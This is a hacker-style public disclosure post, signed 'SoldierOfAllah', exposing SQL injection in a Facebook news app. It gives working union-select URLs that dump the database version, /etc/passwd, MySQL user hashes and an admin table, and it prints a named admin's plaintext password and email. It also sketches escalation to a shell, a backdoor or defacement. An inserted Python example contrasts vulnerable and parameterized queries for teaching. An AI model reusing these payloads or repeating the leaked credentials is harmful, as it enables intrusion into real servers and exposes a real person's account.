Facebook is a social networking website that is operated and privately owned by Facebook, Inc.[1] Users can add friends and send them messages, and update their personal profiles to notify friends about themselves. Additionally, users can join networks organized by city, workplace, school, and region. The website's name stems from the colloquial name of books given at the start of the academic year by university administrations with the intention of helping students get to know each other better.
The website currently has more than 250 million active users worldwide.
Facebook is not capable of securing their database. Millions (LOTS OF MILLIONS) of accounts, email addresses and passwords are up for grabs by anyone.
Another SQL injection flaw on Facebook.com, and this time on apps.facebook.com. I decided to make this issue public.
This bug allows a potential attacker to execute SQL queries directly against the database simply by manipulating the URL.
Let me show you a few concrete examples of vulnerable parameters:
First, let's see the database version, the database name and the MySQL server user:
SQL injection flaw: http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5,6,7,8,9,10--
Data:
database version: 5.0.32-Debian_7etch8-log
database name: nc
MySQL server user: root@localhost
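The root cause behind the URL above, as an added example that is not part of the original post: an `id` value concatenated into the SQL text, beside a validated and bound version. It uses Python's sqlite3 with constructed table names and data as a stand-in for the application's own PHP and MySQL code, which the post does not show.

```python
import sqlite3

def make_db():
    """Constructed in-memory database: a 10-column table read by the page
    handler, plus an unrelated table the handler should never expose."""
    db = sqlite3.connect(":memory:")
    cols = ", ".join(f"c{i}" for i in range(2, 11))
    db.execute(f"CREATE TABLE tweets (id INTEGER PRIMARY KEY, {cols})")
    db.execute("INSERT INTO tweets VALUES (1231, 'a', 'b', 'hello', 0, 0, 0, 0, 0, 0)")
    db.execute("CREATE TABLE admin (loginname TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('demo', 'constructed-secret')")
    return db

def view_vulnerable(db, raw_id):
    # 'Before': the id value from the URL is pasted into the SQL text, so
    # anything after the number is parsed as SQL.
    return db.execute("SELECT * FROM tweets WHERE id = " + raw_id).fetchall()

def view_hardened(db, raw_id):
    # 'After': reject anything that is not a plain decimal id, then bind it
    # as a parameter so it can only ever be compared as a value.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be a decimal integer")
    return db.execute("SELECT * FROM tweets WHERE id = ?", (int(raw_id),)).fetchall()

# URL-decoded id value with the same shape as the one in the post
# (constructed; it only touches the demo 'admin' table defined above).
PAYLOAD = "1231 union select 1,2,3,password,5,6,7,8,9,10 from admin--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, id=1231 :", view_vulnerable(db, "1231"))
    print("vulnerable, payload :", view_vulnerable(db, PAYLOAD))
    print("hardened,   id=1231 :", view_hardened(db, "1231"))
    try:
        view_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("hardened,   payload : rejected,", exc)
```

Independently of the query fix, an application database account without the FILE privilege and without read access to the mysql schema would have limited what the later queries in this post could return.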
In the second screenshot you can execute the function load_file(), which you can use to read files like /etc/passwd. This function executed successfully with magic_quotes_gpc=OFF. With a little patience, you can find a writable directory and, by injecting malicious code, get command-line access, with which we can do anything with the website: upload a backdoor, upload a shell, redirect, or even deface the whole website.
SQL injection flaw: http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,4,5,6,7,8,load_file%280x2f6574632f706173737764%29,10--
Data: the contents of /etc/passwd.
Let's move on to another SQL injection vulnerable parameter. You can see in the image the usernames and passwords of root and other users on the server:
SQLi flaw: http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,concat%28user,0x3A,Password,0x3a%29,5,6,7,8,9,10+FROM+mysql.user--
Data: user names and password hashes from mysql.user.
Now let's see the table phplist_admin:
SQLi flaw: http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,concat_ws(0x3A,id,loginname,password,email%29,5,6,7,8,9,10+FROM+phplistdb.phplist_admin--
Data:
User id = 2
Username = jeff
Password = Cloud9
Email = jeff@reifman.org
Let's move on to another SQL injection vulnerable parameter. This time it's blind SQL injection. What is interesting in the image is, firstly, the error, which is proof that server data can be accessed from this point.
First image:
In this first image we see all the content.
Let's see the second image:
So the database version is: 5
It's Over

Now we conclude that this famous website is not secured, and you can find other bugs in other applications!
I hope you enjoyed.

To Be continued Incha Allah
All rights Reserved For :
SoldierOfAllah And
Owned-m.com